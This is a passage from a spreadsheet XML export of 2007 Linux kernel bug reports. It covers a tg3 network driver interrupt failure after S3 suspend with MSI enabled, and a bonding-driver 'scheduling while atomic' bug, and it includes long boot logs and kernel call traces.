ohci_hcd 0000:00:02.0: OHCI Host Controller ohci_hcd 0000:00:02.0: new USB bus registered, assigned bus number 3 ohci_hcd 0000:00:02.0: irq 23, io mem 0xb0000000 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 10 ports detected Initializing USB Mass Storage driver... usb 2-1: new high speed USB device using ehci_hcd and address 2 usb 2-1: configuration #1 chosen from 1 choice usb 3-2: new low speed USB device using ohci_hcd and address 2 usb 3-2: configuration #1 chosen from 1 choice usb 3-4: new full speed USB device using ohci_hcd and address 3 usb 3-4: configuration #1 chosen from 1 choice usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usbcore: registered new interface driver hiddev input: Microsoft Natural</t>
  </si>
  <si>
    <t>tg3 driver: S3 problem in MSI mode</t>
  </si>
  <si>
    <t>2007-02-08 17:00 UTC</t>
  </si>
  <si>
    <t>Software Environment: 2.6.19 with MSI enabled Problem Description: After a S3 resume, I got "irq 20 nobody cared...", and then IRQ 20 is disabled. I tried different workarounds and finally found the two below make sense to me: 1. boot option "pci=nomsi". At this time, eth0 interrupt is routed to irq #20 rather than PCI-MSI-edge 219. 2. rmmod tg3 driver before suspend and modprobe it after resume. So, I think it's a tg3 driver S3 problem. IMO, after resume from S3, tg3 driver forgets the whole "PCI-MSI" thing and routes the net card interrupt to irq #20, while leaves the actual interrupt handler waiting for PCI-MSI-edge *219. This explains why kernel can not find a handler for irq #20 and the eth0 interrupts from /proc/interrupts stop growing after resume. steps to reproduce: Build kernel with CONFIG_PCI_MSI enabled. echo mem &gt;/sys/power/state press the power button</t>
  </si>
  <si>
    <t>(bonding): scheduling while atomic</t>
  </si>
  <si>
    <t>2007-02-09 08:14 UTC</t>
  </si>
  <si>
    <t>2008-03-24 14:17 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">The machine hangs in normal boot with 2.6.19 and 2.6.20 after network starts. If I boot in single mode and start the services manually, the machine and network works fine, but I see this on dmesg: Linux version 2.6.20 (root@touche.gelre.net.br) (gcc version 4.1.0 20060515 (Red Hat 4.1.0-18)) #6 SMP Mon Feb 5 15:14:30 BRST 2007 Command line: ro root=/dev/sda2 vga=791 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 0000000000100000 - 000000003f7c0000 (usable) BIOS-e820: 000000003f7c0000 - 000000003f7cfc00 (ACPI data) BIOS-e820: 000000003f7cfc00 - 000000003f7ff000 (reserved) BIOS-e820: 000000003f800000 - 0000000040000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000fed00400 (reserved) BIOS-e820: 00000000fed13000 - 00000000feda0000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee10000 (reserved) BIOS-e820: 00000000ffb00000 - 0000000100000000 (reserved) Entering add_active_range(0, 0, 160) 0 entries of 256 used Entering add_active_range(0, 256, 260032) 1 entries of 256 used end_pfn_map = 1048576 DMI 2.3 present. ACPI: RSDP (v000 DELL ) @ 0x00000000000fd690 ACPI: RSDT (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd6a4 ACPI: FADT (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd6dc ACPI: MADT (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd750 ACPI: SPCR (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd7c4 ACPI: HPET (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd814 ACPI: MCFG (v001 DELL PE800 0x00000001 MSFT 0x0100000a) @ 0x00000000000fd84c ACPI: DSDT (v001 DELL PE800 0x00000001 MSFT 0x0100000e) @ 0x0000000000000000 Entering add_active_range(0, 0, 160) 0 entries of 256 used Entering add_active_range(0, 256, 260032) 1 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 DMA32 4096 -&gt; 1048576 Normal 1048576 -&gt; 1048576 early_node_map[2] active PFN ranges 0: 0 -&gt; 160 0: 256 -&gt; 260032 On node 0 totalpages: 259936 DMA zone: 56 pages used for memmap DMA zone: 1279 pages reserved DMA zone: 2665 pages, LIFO batch:0 DMA32 zone: 3499 pages used for memmap DMA32 zone: 252437 pages, LIFO batch:31 Normal zone: 0 pages used for memmap ACPI: PM-Timer IO Port: 0x808 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) Processor #0 (Bootup-CPU) ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) Processor #1 ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] high edge lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x03] address[0xfec80000] gsi_base[32]) IOAPIC[1]: apic_id 3, address 0xfec80000, GSI 32-55 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Setting APIC routing to flat ACPI: HPET id: 0xffffffff base: 0xfed00000 Using ACPI (MADT) for SMP configuration information Nosave address range: 00000000000a0000 - 0000000000100000 Allocating PCI resources starting at 50000000 (gap: 40000000:a0000000) PERCPU: Allocating 33024 bytes of per cpu data Built 1 zonelists. Total pages: 255102 Kernel command line: ro root=/dev/sda2 vga=791 Initializing CPU#0 PID hash table entries: 4096 (order: 12, 32768 bytes) Console: colour dummy device 80x25 Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) Checking aperture... Memory: 1017476k/1040128k available (3075k kernel code, 21768k reserved, 1225k data, 248k init) Calibrating delay using timer specific routine.. 6406.66 BogoMIPS (lpj=12813334) Mount-cache hash table entries: 256 CPU: Trace cache: 12K uops, L1 D cache: 16K CPU: L2 cache: 1024K using mwait in idle threads. CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 CPU0: Thermal monitoring enabled (TM1) Freeing SMP alternatives: 32k freed ACPI: Core revision 20060707 Using local APIC timer interrupts. result 12500392 Detected 12.500 MHz APIC timer. Booting processor 1/2 APIC 0x1 Initializing CPU#1 Calibrating delay using timer specific routine.. 6400.14 BogoMIPS (lpj=12800283) CPU: Trace cache: 12K uops, L1 D cache: 16K CPU: L2 cache: 1024K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 CPU1: Thermal monitoring enabled (TM1) Intel(R) Pentium(R) 4 CPU 3.20GHz stepping 01 Brought up 2 CPUs testing NMI watchdog ... OK. time.c: Using 14.318180 MHz WALL HPET GTOD HPET/TSC timer. time.c: Detected 3200.112 MHz processor. migration_cost=5 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: Using MMCONFIG at e0000000 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) Boot video device is 0000:00:02.0 PCI quirk: region 0800-087f claimed by ICH6 ACPI/GPIO/TCO PCI quirk: region 0880-08bf claimed by ICH6 GPIO PCI: PXH quirk detected, disabling MSI for SHPC device PCI: Transparent bridge - 0000:00:1e.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PES1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEP0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEP0.PXHA._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEP1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEP2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEP3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIS._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 *5 6 7 9 10 11 12) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 *10 11 12) ACPI: PCI Interrupt Link [LNKE] (IRQs *3 4 5 6 7 9 10 11 12) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 9 10 11 12) *0, disabled. SCSI subsystem initialized libata version 2.00 loaded. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report PCI-GART: No AMD northbridge found. PCI: Ignore bogus resource 6 [0:0] of 0000:00:02.0 PCI: Bridge: 0000:01:00.0 IO window: e000-efff MEM window: dfd00000-dfefffff PREFETCH window: d8000000-dbffffff PCI: Bridge: 0000:00:01.0 IO window: e000-efff MEM window: dfc00000-dfefffff PREFETCH window: d8000000-dbffffff PCI: Bridge: 0000:00:1c.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.1 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.2 IO window: d000-dfff MEM window: dfa00000-dfbfffff PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.3 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:1e.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. ACPI: PCI Interrupt 0000:00:01.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:01.0 to 64 PCI: Setting latency timer of device 0000:01:00.0 to 64 ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1c.0 to 64 ACPI: PCI Interrupt 0000:00:1c.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1c.1 to 64 ACPI: PCI Interrupt 0000:00:1c.2[C] -&gt; GSI 22 (level, low) -&gt; IRQ 22 PCI: Setting latency timer of device 0000:00:1c.2 to 64 ACPI: PCI Interrupt 0000:00:1c.3[D] -&gt; GSI 23 (level, low) -&gt; IRQ 23 PCI: Setting latency timer of device 0000:00:1c.3 to 64 PCI: Setting latency timer of device 0000:00:1e.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 6, 262144 bytes) TCP established hash table entries: 131072 (order: 9, 2097152 bytes) TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered checking if image is initramfs... it is Freeing initrd memory: 747k freed VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 512 (order 0, 4096 bytes) SGI XFS with ACLs, security attributes, realtime, large block/inode numbers, no debug enabled SGI XFS Quota Management subsystem io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) vesafb: framebuffer at 0xd0000000, mapped to 0xffffc20010100000, using 3072k, total 7872k vesafb: mode is 1024x768x16, linelength=2048, pages=4 vesafb: scrolling: redraw vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 Console: switching to colour frame buffer device 128x48 fb0: VESA VGA frame buffer device input: Power Button (FF) as /class/input/input0 ACPI: Power Button (FF) [PWRF] Real Time Clock Driver v1.12ac intel_rng: FWH not detected Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.1.0 20060810 Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A RAMDISK driver initialized: 16 RAM disks of 16384K size 1024 blocksize Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH6: IDE controller at PCI slot 0000:00:1f.1 ACPI: Unable to derive IRQ for device 0000:00:1f.1 ACPI: PCI Interrupt 0000:00:1f.1[A]: no GSI ICH6: chipset revision 3 ICH6: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xfc00-0xfc07, BIOS settings: hda:DMA, hdb:pio Probing IDE interface ide0... hda: GCR-8483B, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hda: ATAPI 48X CD-ROM drive, 128kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 ide-floppy driver 0.99.newide Adaptec aacraid driver (1.1-5[2423]-mh3) ACPI: PCI Interrupt 0000:02:01.0[A] -&gt; GSI 32 (level, low) -&gt; IRQ 32 AAC0: kernel 4.1-0[7406] AAC0: monitor 4.1-0[7406] AAC0: bios 4.1-0[7406] AAC0: serial c3b9c8 scsi0 : aacraid scsi 0:0:0:0: Direct-Access CERC imgelre V1.0 PQ: 0 ANSI: 2 SCSI device sda: 156182272 512-byte hdwr sectors (79965 MB) sda: assuming Write Enabled sda: assuming drive cache: write through SCSI device sda: 156182272 512-byte hdwr sectors (79965 MB) sda: assuming Write Enabled sda: assuming drive cache: write through sda: sda1 sda2 sda3 sd 0:0:0:0: Attached scsi removable disk sda sd 0:0:0:0: Attached scsi generic sg0 type 0 ahci 0000:00:1f.2: version 2.0 ACPI: PCI Interrupt 0000:00:1f.2[C] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ahci 0000:00:1f.2: PORTS_IMPL is zero, forcing 0xf PCI: Setting latency timer of device 0000:00:1f.2 to 64 ahci 0000:00:1f.2: AHCI 0001.0000 32 slots 4 ports 1.5 Gbps 0xf impl IDE mode ahci 0000:00:1f.2: flags: 64bit ncq pm led pmp slum part ata1: SATA max UDMA/133 cmd 0xFFFFC20000002100 ctl 0x0 bmdma 0x0 irq 20 ata2: SATA max UDMA/133 cmd 0xFFFFC20000002180 ctl 0x0 bmdma 0x0 irq 20 ata3: SATA max UDMA/133 cmd 0xFFFFC20000002200 ctl 0x0 bmdma 0x0 irq 20 ata4: SATA max UDMA/133 cmd 0xFFFFC20000002280 ctl 0x0 bmdma 0x0 irq 20 scsi1 : ahci ata1: SATA link down (SStatus 0 SControl 300) scsi2 : ahci ata2: SATA link down (SStatus 0 SControl 300) scsi3 : ahci ata3: SATA link down (SStatus 0 SControl 300) scsi4 : ahci ata4: SATA link down (SStatus 0 SControl 300) usbcore: registered new interface driver hiddev usbcore: registered new interface driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice input: AT Translated Set 2 keyboard as /class/input/input1 nf_conntrack version 0.5.0 (4063 buckets, 32504 max) ip_tables: (C) 2000-2006 Netfilter Core Team arp_tables: (C) 2002 David S. Miller TCP cubic registered Initializing XFRM netlink socket NET: Registered protocol family 1 NET: Registered protocol family 17 Freeing unused kernel memory: 248k freed XFS mounting filesystem sda2 Starting XFS recovery on filesystem: sda2 (logdev: internal) Ending XFS recovery on filesystem: sda2 (logdev: internal) Floppy drive(s): fd0 is 1.44M FDC 0 is a National Semiconductor PC87306 Ethernet Channel Bonding Driver: v3.1.1 (September 26, 2006) bonding: In ALB mode you might experience client disconnections upon reconnection of a link if the bonding module updelay parameter (5000 msec) is incompatible with the forwarding delay time of the switch bonding: MII link monitoring set to 100 ms tg3.c:v3.72 (January 8, 2007) ACPI: PCI Interrupt 0000:05:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:05:00.0 to 64 eth0: Tigon3 [partno(BCM95721) rev 4001 PHY(5750)] (PCI Express) 10/100/1000Base-T Ethernet 00:12:3f:6e:2c:f4 eth0: RXcsums[1] LinkChgREG[1] MIirq[1] ASF[1] Split[0] WireSpeed[1] TSOcap[1] eth0: dma_rwctrl[76180000] dma_mask[64-bit] Intel(R) PRO/1000 Network Driver - version 7.3.15-k2-NAPI Copyright (c) 1999-2006 Intel Corporation. ACPI: PCI Interrupt 0000:02:02.0[A] -&gt; GSI 35 (level, low) -&gt; IRQ 35 e1000: 0000:02:02.0: e1000_probe: (PCI:66MHz:64-bit) 00:0e:0c:80:f8:a9 e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection ACPI: Unable to derive IRQ for device 0000:00:1f.3 ACPI: PCI Interrupt 0000:00:1f.3[B]: no GSI ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 1 ehci_hcd 0000:00:1d.7: debug port 1 PCI: cache line size of 128 is not supported by device 0000:00:1d.7 ehci_hcd 0000:00:1d.7: irq 19, io mem 0xdffc0400 ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 8 ports detected USB Universal Host Controller Interface driver v3.0 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 2 uhci_hcd 0000:00:1d.0: irq 19, io base 0x0000ccc0 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 3 uhci_hcd 0000:00:1d.1: irq 18, io base 0x0000cca0 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 19 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1d.2 to 64 uhci_hcd 0000:00:1d.2: UHCI Host Controller uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 4 uhci_hcd 0000:00:1d.2: irq 19, io base 0x0000cc80 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.3[D] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:1d.3 to 64 uhci_hcd 0000:00:1d.3: UHCI Host Controller uhci_hcd 0000:00:1d.3: new USB bus registered, assigned bus number 5 uhci_hcd 0000:00:1d.3: irq 18, io base 0x0000cc60 usb usb5: configuration #1 chosen from 1 choice hub 5-0:1.0: USB hub found hub 5-0:1.0: 2 ports detected md: Autodetecting RAID arrays. md: autorun ... md: ... autorun DONE. No dock devices found. device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com kjournald starting. Commit interval 5 seconds EXT3 FS on sda1, internal journal EXT3-fs: mounted filesystem with ordered data mode. Adding 2024180k swap on /dev/sda3. Priority:-1 extents:1 across:2024180k bonding: bond0: enslaving eth0 as an active interface with a down link. bonding: bond0: enslaving eth1 as an active interface with a down link. tg3: eth0: Link is up at 1000 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. bonding: bond0: link status up for interface eth0, enabling it in 5000 ms. bonding: bond0: link status definitely up for interface eth0. bonding: bond0: making interface eth0 the new active one. BUG: scheduling while atomic: swapper/0x10000100/0 Call Trace: &lt;IRQ&gt; [&lt;ffffffff802607d0&gt;] __sched_text_start+0x60/0xb27 [&lt;ffffffff8802c8a1&gt;] :tg3:tg3_setup_copper_phy+0x9d9/0xad9 [&lt;ffffffff8026f8d5&gt;] smp_local_timer_interrupt+0x34/0x5b [&lt;ffffffff8802d6d4&gt;] :tg3:tg3_setup_phy+0xd33/0xe16 [&lt;ffffffff8027f572&gt;] __cond_resched+0x1c/0x44 [&lt;ffffffff802613aa&gt;] cond_resched+0x2e/0x39 [&lt;ffffffff80209f5a&gt;] kmem_cache_alloc+0x14/0x58 [&lt;ffffffff8022df6f&gt;] __alloc_skb+0x36/0x134 [&lt;ffffffff804a4ea7&gt;] rtmsg_ifinfo+0x28/0xa1 [&lt;ffffffff804a4f81&gt;] rtnetlink_event+0x61/0x68 [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b0c&gt;] :bonding:alb_swap_mac_addr+0x8b/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 RTNL: assertion failed at net/core/fib_rules.c (444) Call Trace: &lt;IRQ&gt; [&lt;ffffffff804a8abb&gt;] fib_rules_event+0x3b/0x120 [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b0c&gt;] :bonding:alb_swap_mac_addr+0x8b/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 BUG: scheduling while atomic: swapper/0x10000100/0 Call Trace: &lt;IRQ&gt; [&lt;ffffffff802607d0&gt;] __sched_text_start+0x60/0xb27 [&lt;ffffffff8026f8d5&gt;] smp_local_timer_interrupt+0x34/0x5b [&lt;ffffffff8027f572&gt;] __cond_resched+0x1c/0x44 [&lt;ffffffff802613aa&gt;] cond_resched+0x2e/0x39 [&lt;ffffffff80262029&gt;] mutex_lock+0x9/0x18 [&lt;ffffffff8049ea76&gt;] netdev_run_todo+0x16/0x230 [&lt;ffffffff804bcc75&gt;] dst_rcu_free+0x0/0x3f [&lt;ffffffff804d9c29&gt;] inetdev_event+0x29/0x2d0 [&lt;ffffffff80263138&gt;] _spin_lock_bh+0x9/0x19 [&lt;ffffffff8023d84a&gt;] rt_run_flush+0x92/0xcc [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b0c&gt;] :bonding:alb_swap_mac_addr+0x8b/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 RTNL: assertion failed at net/ipv4/devinet.c (1055) Call Trace: &lt;IRQ&gt; [&lt;ffffffff804d9c48&gt;] inetdev_event+0x48/0x2d0 [&lt;ffffffff80263138&gt;] _spin_lock_bh+0x9/0x19 [&lt;ffffffff8023d84a&gt;] rt_run_flush+0x92/0xcc [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b0c&gt;] :bonding:alb_swap_mac_addr+0x8b/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 BUG: scheduling while atomic: swapper/0x10000100/0 Call Trace: &lt;IRQ&gt; [&lt;ffffffff802607d0&gt;] __sched_text_start+0x60/0xb27 [&lt;ffffffff8802c8a1&gt;] :tg3:tg3_setup_copper_phy+0x9d9/0xad9 [&lt;ffffffff8026f8d5&gt;] smp_local_timer_interrupt+0x34/0x5b [&lt;ffffffff8802d6d4&gt;] :tg3:tg3_setup_phy+0xd33/0xe16 [&lt;ffffffff8027f572&gt;] __cond_resched+0x1c/0x44 [&lt;ffffffff802613aa&gt;] cond_resched+0x2e/0x39 [&lt;ffffffff80209f5a&gt;] kmem_cache_alloc+0x14/0x58 [&lt;ffffffff8022df6f&gt;] __alloc_skb+0x36/0x134 [&lt;ffffffff804a4ea7&gt;] rtmsg_ifinfo+0x28/0xa1 [&lt;ffffffff804a4f81&gt;] rtnetlink_event+0x61/0x68 [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b1e&gt;] :bonding:alb_swap_mac_addr+0x9d/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] 